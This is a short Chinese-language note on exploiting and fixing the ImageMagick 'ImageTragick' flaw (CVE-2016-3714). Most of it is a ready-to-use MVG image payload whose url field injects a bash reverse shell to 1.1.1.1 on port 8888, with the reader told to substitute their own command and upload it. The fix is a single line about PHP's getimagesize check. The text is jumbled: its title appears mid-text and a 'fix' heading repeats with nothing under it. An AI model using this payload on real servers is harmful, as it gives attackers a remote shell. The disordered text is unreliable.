利用:
如下内容保存为图片格式上传即可(命令部分自行替换)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context
修复(php):
上传时先利用getimagesize函数检查是否为正常图片
ImageMagick漏洞(cve-2016-3714)利用及修复
修复(php):